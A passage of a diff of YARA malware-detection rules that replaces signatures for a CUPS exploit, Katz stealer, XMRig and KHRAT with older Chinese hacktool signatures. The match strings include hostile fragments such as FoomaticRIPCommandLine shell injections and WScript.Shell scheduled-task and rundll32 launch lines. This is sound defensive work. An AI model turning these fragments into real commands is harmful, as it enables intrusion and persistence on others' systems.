-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cups_sep24.yar#L17-L38"
+		description = "Chinese Hacktool Set - file srss.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3a84fa58-ccd0-5cf0-b1e0-a8f2ca04fd3f"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1834-L1856"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2158ca8a08cb7552e2a437de025e3aad63ddc5417245e6ede7283d3bd0fc159b"
-		score = 65
+		hash = "c418b30d004051bbf1b2d3be426936b95b5fea6f"
+		logic_hash = "e674ac7a99a67e2ebe8b4c4232e3435dd041b794f6c08a87ef7b8179127d6fc7"
+		score = 75
 		quality = 85
-		tags = "CVE-2024-47177"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "FoomaticRIPCommandLine: \"bash " ascii
-		$ = "FoomaticRIPCommandLine: \"sh " ascii
-		$ = "FoomaticRIPCommandLine: \"python " ascii
-		$ = "FoomaticRIPCommandLine: \"perl " ascii
-		$ = "FoomaticRIPCommandLine: \"echo " ascii
-		$ = "FoomaticRIPCommandLine: \\\"bash " ascii
-		$ = "FoomaticRIPCommandLine: \\\"sh " ascii
-		$ = "FoomaticRIPCommandLine: \\\"python " ascii
-		$ = "FoomaticRIPCommandLine: \\\"perl " ascii
-		$ = "FoomaticRIPCommandLine: \\\"echo " ascii
+		$x1 = "used pepack!" fullword ascii
+		$s1 = "KERNEL32.dll" fullword ascii
+		$s2 = "KERNEL32.DLL" fullword ascii
+		$s3 = "LoadLibraryA" fullword ascii
+		$s4 = "GetProcAddress" fullword ascii
+		$s5 = "VirtualProtect" fullword ascii
+		$s6 = "VirtualAlloc" fullword ascii
+		$s7 = "VirtualFree" fullword ascii
+		$s8 = "ExitProcess" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and ( $x1 at 0 ) and filesize < 14KB and all of ( $s* )
 }
-rule SIGNATURE_BASE_MAL_Katz_Stealer_May25 : FILE
+rule SIGNATURE_BASE_Dos_Ntgod : FILE
 {
 	meta:
-		description = "Detects Katz stealer"
-		author = "MalGamy (Nextron Systems)"
-		id = "efa42aec-b653-5e94-8d5b-73f0aab2a54d"
-		date = "2025-05-16"
-		modified = "2025-05-22"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_katz_stealer.yar#L1-L21"
+		description = "Chinese Hacktool Set - file NtGod.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c2f0733d-5519-5cb8-b077-0ae8472400b4"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1858-L1874"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fdc86a5b3d7df37a72c3272836f743747c47bfbc538f05af9ecf78547fa2e789"
-		hash = "d92bb6e47cb0a0bdbb51403528ccfe643a9329476af53b5a729f04a4d2139647"
-		logic_hash = "73364c2291dc792f46858dda057f08805db55fe1f1e54d6b0dee0a0c8a412259"
-		score = 80
+		hash = "adefd901d6bbd8437116f0170b9c28a76d4a87bf"
+		logic_hash = "77b9204add5d25dcc36eabc07cabea2bdc67a23873c2faf7706e7fba5ed53f8b"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Motherboard Product: %s" ascii
-		$s2 = "cmd.exe /c %s" ascii
-		$s3 = "reg export \"%s\" \"%s\" /y" ascii
-		$s4 = ").request({ hostname: '" ascii
-		$s5 = "Type: Removable"
-		$s6 = "%s\\Microsoft\\Windows Live Mail" ascii
+		$s0 = "\\temp\\NtGodMode.exe" ascii
+		$s4 = "NtGodMode.exe" fullword ascii
+		$s10 = "ntgod.bat" fullword ascii
+		$s19 = "sfxcmd" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and 4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 250KB and all of them
 }
-rule SIGNATURE_BASE_MAL_DLL_Chrome_App_Bound_Encryption_Decryption_May25 : FILE
+rule SIGNATURE_BASE_CN_Tools_Vnclink : FILE
 {
 	meta:
-		description = "Detects a DLL used to decrypt App-Bound Encrypted (ABE) cookies, passwords and payment methods from Chromium-based browsers. Seen being used by Katz stealer"
-		author = "MAlGamy"
-		id = "bc77e972-fd7e-55dd-b118-ee76f19cde1a"
-		date = "2025-05-19"
-		modified = "2025-05-22"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_katz_stealer.yar#L23-L41"
+		description = "Chinese Hacktool Set - file VNCLink.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "270dc14c-ac8f-58c2-b4ac-c10981e20a07"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1876-L1891"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6dc8e99da68b703e86fa90a8794add87614f254f804a8d5d65927e0676107a9d"
-		logic_hash = "d5488728a3ee8f2f59ed9798b80d516f7f131e39b3d5099ad5168ffc8ff22718"
-		score = 80
+		hash = "cafb531822cbc0cfebbea864489eebba48081aa1"
+		logic_hash = "21328e2a871dfcfda47991a1f1e897efd27471420d644c09a94004cf5b0f9869"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Failed to set proxy blanket." ascii
-		$s2 = "Decryption failed. Last error:" ascii
-		$s3 = "\\Google\\Chrome\\User Data\\Local State" ascii
-		$op1 = {48 39 F3 74 ?? 4C 89 E2 48 89 E9 E8 ?? ?? ?? ?? 48 89 C1 48 8B 00 B2 ?? 48 8B 40 ?? 48 C7 44 01 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 13 48 89 C1 E8 ?? ?? ?? ?? 48 FF C3 EB ?? 48 8D 54 24 ?? 48 89 F9 E8 ?? ?? ?? ?? 48 89 E9 E8 ?? ?? ?? ?? 48 89 F8 48 81 C4}
+		$s1 = "C:\\temp\\vncviewer4.log" fullword ascii
+		$s2 = "[BL4CK] Patched by redsand || http://blacksecurity.org" fullword ascii
+		$s3 = "fake release extendedVkey 0x%x, keysym 0x%x" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2MB and $op1 and 1 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 580KB and 2 of them
 }
-rule SIGNATURE_BASE_SUSP_Katz_Log_May25 : FILE
+rule SIGNATURE_BASE_Tools_Ntcmd : FILE
 {
 	meta:
-		description = "Detects log file that contains system reconnaissance data, seen being generated by Katz stealer"
-		author = "MalGamy"
-		id = "29ef2f42-d360-59f9-bb70-b0c68f9dfb7c"
-		date = "2025-05-20"
-		modified = "2025-05-22"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_katz_stealer.yar#L43-L63"
+		description = "Chinese Hacktool Set - file NTCmd.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "db3f28d6-dfe8-5c79-a11b-e31701e250d7"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1893-L1911"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1ac196ac6393d786618c944a7ab77fb189a6b4ba00af5c0f987c3dc65876c060"
-		hash = "ad76e2727469525dec7e56977589dd250ca57a29b8b0d42cd5c42e536c285241"
-		hash = "e1a0d6929662bcbc9e5e0827cb8b6d7818088e996cf971d2a4a1c1ca4208e533"
-		hash = "b10796c41e1cec7c84a3c68bfcaa7b20f49b620d1c94304a6b3ed73471fa9031"
-		hash = "5a984e2e308fe84e4e2071dd877772361719ba0217c2c23da79dbb82dc15eac8"
-		logic_hash = "847ab8f9a7abf260f4185d41ae9cb9af40c28726338ff2306a75d2160ae61f03"
-		score = 65
+		hash = "a3ae8659b9a673aa346a60844208b371f7c05e3c"
+		logic_hash = "c2487306a0d82ab76a048c001361c25bcd61d0f7a57a3b22df1c70299f0a72ba"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Motherboard Manufacturer:" ascii
-		$s2 = "===== System Information =====" ascii
-		$s3 = "Volume Name:" ascii
-		$s4 = "Desktop Hostname:" ascii
+		$s1 = "pipecmd \\\\%s -U:%s -P:\"\" %s" fullword ascii
+		$s2 = "[Usage]:  %s <HostName|IP> <Username> <Password>" fullword ascii
+		$s3 = "pipecmd \\\\%s -U:%s -P:%s %s" fullword ascii
+		$s4 = "============By uhhuhy (Feb 18,2003) - http://www.cnhonker.net============" fullword ascii
+		$s5 = "=======================NTcmd v0.11 for HScan v1.20=======================" fullword ascii
+		$s6 = "NTcmd>" fullword ascii
 
 	condition:
-		filesize < 50KB and 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 80KB and 2 of them
 }
-rule SIGNATURE_BASE_MAL_NET_Katz_Stealer_Loader_May25
+rule SIGNATURE_BASE_Mysql_Pwd_Crack : FILE
 {
 	meta:
-		description = "Detects .NET based Katz stealer loader"
-		author = "Jonathan Peters (cod3nym)"
-		id = "90e86bb2-ffb2-5968-9cdc-705efac73b0d"
-		date = "2025-05-21"
-		modified = "2025-05-22"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_katz_stealer.yar#L65-L84"
+		description = "Chinese Hacktool Set - file mysql_pwd_crack.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3ddeb1c7-e124-5e9e-abcf-3856e0561165"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1913-L1930"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0df13fd42fb4a4374981474ea87895a3830eddcc7f3bd494e76acd604c4004f7"
-		logic_hash = "1922520d8c34660a0afff2f552ef0d1c6ec093fb10a00816e0216f574b686221"
-		score = 80
+		hash = "57d1cb4d404688804a8c3755b464a6e6248d1c73"
+		logic_hash = "d272b98a6cf2749482ee501734d0043564ba528770161cb0ed4f032409305f22"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x = "ExecutarMetodoVAI" ascii
-		$s1 = "VirtualMachineDetector" ascii
-		$s2 = "Wow64SetThreadContext_API" ascii
-		$s3 = "nomedoarquivo" ascii
-		$s4 = { 65 78 74 65 6E C3 A7 61 6F 00 }
-		$s5 = "payloadBuffer" ascii
-		$s6 = "caminhovbs" ascii
+		$s1 = "mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.txt" fullword ascii
+		$s2 = "Successfully --> username %s password %s " fullword ascii
+		$s3 = "zhouzhen@gmail.com http://zhouzhen.eviloctal.org" fullword ascii
+		$s4 = "-a automode  automatic crack the mysql password " fullword ascii
+		$s5 = "mysql_pwd_crack 127.0.0.1 -x 3306 -a" fullword ascii
 
 	condition:
-		3 of ( $s* ) or $x
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_NET_UAC_Bypass_May25 : FILE
+rule SIGNATURE_BASE_Cmdshell64 : FILE
 {
 	meta:
-		description = "Detects .NET based tool abusing legitimate Windows utility cmstp.exe to bypass UAC (User-Admin-Controls)"
-		author = "Jonathan Peters (cod3nym)"
-		id = "5d714088-c917-51b5-b422-1d8fa00b1949"
-		date = "2025-05-21"
-		modified = "2025-05-22"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_katz_stealer.yar#L86-L103"
+		description = "Chinese Hacktool Set - file CmdShell64.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f4d69be7-f717-53f7-873e-86acbb309106"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1932-L1951"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4f12c5dca2099492d0c0cd22edef841cbe8360af9be2d8e9b57c2f83d401c1a7"
-		hash = "fcad234dc2ad5e2d8215bcf6caac29aef62666c34564e723fa6d2eee8b6468ed"
-		logic_hash = "4a3f6e90af6f9a8a4dfa8e336eb8c714e5f02625ca2bf5bf8b1bca9cbda6a99e"
-		score = 80
+		hash = "5b92510475d95ae5e7cd6ec4c89852e8af34acf1"
+		logic_hash = "fd8010ab2ab51feed62475f840ffaeef92cf1266c139b8f669b7fa5ff646fdab"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "CmstpBypass" ascii
-		$x2 = { 52 00 45 00 50 00 4C 00 41 00 43 00 45 00 5F 00 43 00 4F 00 4D 00 4D 00 41 00 4E 00 44 00 5F 00 4C 00 49 00 4E 00 45 00 00 13 63 00 6D 00 73 00 74 00 70 00 2E 00 65 00 78 00 65 00 00 33 63 00 6D 00 73 00 74 00 70 00 2E 00 65 00 78 00 65 }
-		$x3 = { 52 00 45 00 50 00 4C 00 41 00 43 00 45 00 5F 00 43 00 4F 00 4D 00 4D 00 41 00 4E 00 44 00 5F 00 4C 00 49 00 4E 00 45 00 0D 00 0A 00 74 00 61 00 73 00 6B 00 6B 00 69 00 6C 00 6C 00 20 00 2F 00 49 00 4D 00 20 00 63 00 6D 00 73 00 74 00 70 00 2E 00 65 00 78 00 65 }
+		$s1 = "C:\\Windows\\System32\\JAVASYS.EXE" fullword wide
+		$s2 = "ServiceCmdShell" fullword ascii
+		$s3 = "<!-- If your application is designed to work with Windows 8.1, uncomment the fol" ascii
+		$s4 = "ServiceSystemShell" fullword wide
+		$s5 = "[Root@CmdShell ~]#" fullword wide
+		$s6 = "Hello Man 2015 !" fullword wide
+		$s7 = "CmdShell" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $x1 or 1 of ( $x2 , $x3 )
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and 4 of them
 }
-rule SIGNATURE_BASE_XMRIG_Monero_Miner : HIGHVOL FILE
+rule SIGNATURE_BASE_Ms_Viru_V : FILE
 {
 	meta:
-		description = "Detects Monero mining software"
+		description = "Chinese Hacktool Set - file v.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "71bf1b9c-c806-5737-83a9-d6013872b11d"
-		date = "2018-01-04"
-		modified = "2022-11-10"
-		reference = "https://github.com/xmrig/xmrig/releases"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/pua_xmrig_monero_miner.yar#L11-L33"
+		id = "88a01e7a-8210-5e0c-a9b8-b7c9b991e16b"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1953-L1971"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "532e602dfc8e44326e381d0e2a189b60bc4d4f2b310169767b2326e01606a542"
+		hash = "ecf4ba6d1344f2f3114d52859addee8b0770ed0d"
+		logic_hash = "028b589c11eeacb2edfeeaeaebf2da370e540cba964c9ebbb19e4c734afe190f"
 		score = 75
 		quality = 85
-		tags = "HIGHVOL, FILE"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0"
-		hash2 = "08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7"
-		hash3 = "f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5"
-		hash4 = "0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2"
 
 	strings:
-		$s1 = "'h' hashrate, 'p' pause, 'r' resume" fullword ascii
-		$s2 = "--cpu-affinity" ascii
-		$s3 = "set process affinity to CPU core(s), mask 0x3 for cores 0 and 1" ascii
-		$s4 = "password for mining server" fullword ascii
-		$s5 = "XMRig/%s libuv/%s%s" fullword ascii
+		$s1 = "c:\\windows\\system32\\command.com /c " fullword ascii
+		$s2 = "Easy Usage Version -- Edited By: racle@tian6.com" fullword ascii
+		$s3 = "OH,Sry.Too long command." fullword ascii
+		$s4 = "Success! Commander." fullword ascii
+		$s5 = "Hey,how can racle work without ur command ?" fullword ascii
+		$s6 = "The exploit thread was unable to map the virtual 8086 address space" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and filesize < 10MB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 3 of them
 }
-rule SIGNATURE_BASE_XMRIG_Monero_Miner_Config : FILE
+rule SIGNATURE_BASE_CN_Tools_Vscan : FILE
 {
 	meta:
-		description = "Auto-generated rule - from files config.json, config.json"
+		description = "Chinese Hacktool Set - file Vscan.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "374efe7f-9ef2-5974-8e24-f749183ab2d0"
-		date = "2018-01-04"
+		id = "2d73d9c9-62cd-592f-a44e-0a0456c85a3c"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://github.com/xmrig/xmrig/releases"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/pua_xmrig_monero_miner.yar#L35-L51"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1973-L1990"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5df14af366cdb0a5bf6fd88b50876fd78abfe0b795cf10af8fab0d23a54f700f"
+		hash = "0365fe05e2de0f327dfaa8cd0d988dbb7b379612"
+		logic_hash = "2bbf0a3fb2b3fc9b646c6f8fc021f65a38e1b64edd74301481051541f8938902"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "031333d44a3a917f9654d7e7257e00c9d961ada3bee707de94b7c7d06234909a"
-		hash2 = "409b6ec82c3bdac724dae702e20cb7f80ca1e79efa4ff91212960525af016c41"
 
 	strings:
-		$s2 = "\"cpu-affinity\": null,   // set process affinity to CPU core(s), mask \"0x3\" for cores 0 and 1" fullword ascii
-		$s5 = "\"nicehash\": false                  // enable nicehash/xmrig-proxy support" fullword ascii
-		$s8 = "\"algo\": \"cryptonight\",  // cryptonight (default) or cryptonight-lite" fullword ascii
+		$s1 = "[+] Usage: VNC_bypauth <target> <scantype> <option>" fullword ascii
+		$s2 = "========RealVNC <= 4.1.1 Bypass Authentication Scanner=======" fullword ascii
+		$s3 = "[+] Type VNC_bypauth <target>,<scantype> or <option> for more informations" fullword ascii
+		$s4 = "VNC_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,..." fullword ascii
+		$s5 = "-vn:%-15s:%-7d  connection closed" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x0a7b or uint16( 0 ) == 0x0d7b ) and filesize < 5KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and 2 of them
 }
-rule SIGNATURE_BASE_PUA_LNX_XMRIG_Cryptominer : FILE
+rule SIGNATURE_BASE_Dos_Iis : FILE
 {
 	meta:
-		description = "Detects XMRIG CryptoMiner software"
+		description = "Chinese Hacktool Set - file iis.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bbdeff2e-68cc-5bbe-b843-3cba9c8c7ea8"
-		date = "2018-06-28"
-		modified = "2023-01-06"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/pua_xmrig_monero_miner.yar#L53-L70"
+		id = "8813b7a2-0d44-5f26-80ab-0f493c09a027"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L1992-L2011"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "501bc5b2d38882f48d1ef972dbbd379afb89f2e7c9bf69192c7bee2e19384816"
+		hash = "61ffd2cbec5462766c6f1c44bd44eeaed4f3d2c7"
+		logic_hash = "d6852af79eac659f4dfa3019793290e0498739f02a06c5540cd7d2c65b46b960"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "10a72f9882fc0ca141e39277222a8d33aab7f7a4b524c109506a407cd10d738c"
 
 	strings:
-		$x1 = "number of hash blocks to process at a time (don't set or 0 enables automatic selection o" fullword ascii
-		$s2 = "'h' hashrate, 'p' pause, 'r' resume, 'q' shutdown" fullword ascii
-		$s3 = "* THREADS:      %d, %s, aes=%d, hf=%zu, %sdonate=%d%%" fullword ascii
-		$s4 = ".nicehash.com" ascii
+		$s1 = "comspec" fullword ascii
+		$s2 = "program terming" fullword ascii
+		$s3 = "WinSta0\\Defau" fullword ascii
+		$s4 = "* FROM IIsWebInfo" ascii
+		$s5 = "www.icehack." ascii
+		$s6 = "wmiprvse.exe" fullword ascii
+		$s7 = "Pid: %d" ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 8000KB and ( 1 of ( $x* ) or 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 70KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_XMRIG_String : FILE
+rule SIGNATURE_BASE_Iisputscannesr : FILE
 {
 	meta:
-		description = "Detects a suspicious XMRIG crypto miner executable string in filr"
+		description = "Chinese Hacktool Set - file IISPutScannesr.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8c6f3e6e-df2a-51b7-81b8-21cd33b3c603"
-		date = "2018-12-28"
+		id = "c5d358e8-955f-5b96-89e7-eb0b6c4d0af0"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/pua_xmrig_monero_miner.yar#L72-L84"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2013-L2027"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d2c3145c50939e7f407125f7b9312161724b7b1a6fcbf7e27d049e49e982c7e9"
-		score = 65
+		hash = "2dd8fee20df47fd4eed5a354817ce837752f6ae9"
+		logic_hash = "27c190050aabcdff3713b388adb0113ad2334c107a2a7b3d682c209b102cf642"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "eb18ae69f1511eeb4ed9d4d7bcdf3391a06768f384e94427f4fc3bd21b383127"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "xmrig.exe" fullword ascii
+		$s1 = "yoda & M.o.D." ascii
+		$s2 = "-> come.to/f2f **************" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them
 }
-
-rule SIGNATURE_BASE_KHRAT_Malware : FILE
+rule SIGNATURE_BASE_HKTL_Unknown_CN_Generate : FILE
 {
 	meta:
-		description = "Detects an Imphash of KHRAT malware"
+		description = "Chinese Hacktool Set - file Generate.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3e6a5aca-9898-5864-8974-ca4adf272893"
-		date = "2017-08-31"
-		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_khrat.yar#L13-L24"
+		id = "88ad2c71-519f-58b0-87f8-a6f54a54a774"
+		date = "2015-06-13"
+		modified = "2022-01-20"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2029-L2047"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cfc1a9fb4dbec4deb70616ab7c4cce3cf56429f61fd36f78245621527d011e20"
+		hash = "2cb4c3916271868c30c7b4598da697f59e9c7a12"
+		logic_hash = "a83000880bd71f4ee6507cb448b611cb670a47a4dc47c400930d3a41ca594a5d"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "53e27fd13f26462a58fa5587ecd244cab4da23aa80cf0ed6eb5ee9f9de2688c1"
+
+	strings:
+		$s1 = "C:\\TEMP\\" ascii
+		$s2 = "Connection Closed Gracefully.;Could not bind socket. Address and port are alread" wide
+		$s3 = "$530 Please login with USER and PASS." fullword ascii
+		$s4 = "_Shell.exe" fullword ascii
+		$s5 = "ftpcWaitingPassword" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and pe.imphash ( ) == "6a8478ad861f98f8428a042f74de1944"
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 3 of them
 }
-rule SIGNATURE_BASE_MAL_KHRAT_Script
+rule SIGNATURE_BASE_Pc_Rejoice : FILE
 {
 	meta:
-		description = "Rule derived from KHRAT script but can match on other malicious scripts as well"
+		description = "Chinese Hacktool Set - file rejoice.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fd345647-4887-560e-a6b2-129a880026aa"
-		date = "2017-08-31"
+		id = "197b5a21-e1ed-5ea8-b7f2-e84684aedc54"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_khrat.yar#L26-L41"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2049-L2067"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c27a89028794b50b95850d90ee29b56606e6b58b862a26e287077e7f7be7f096"
+		hash = "fe634a9f5d48d5c64c8f8bfd59ac7d8965d8f372"
+		logic_hash = "9e22a98b5065a95a7f169fda8d6d4112101bffa11a1407e03ec152db41857206"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8c88b4177b59f4cac820b0019bcc7f6d3d50ce4badb689759ab0966780ae32e3"
 
 	strings:
-		$x1 = "CreateObject(\"WScript.Shell\").Run \"schtasks /create /sc MINUTE /tn" ascii
-		$x2 = "CreateObject(\"WScript.Shell\").Run \"rundll32.exe javascript:\"\"\\..\\mshtml,RunHTMLApplication" ascii
-		$x3 = "<registration progid=\"ff010f\" classid=\"{e934870c-b429-4d0d-acf1-eef338b92c4b}\" >" fullword ascii
+		$s1 = "@members.3322.net/dyndns/update?system=dyndns&hostname=" fullword ascii
+		$s2 = "http://www.xxx.com/xxx.exe" fullword ascii
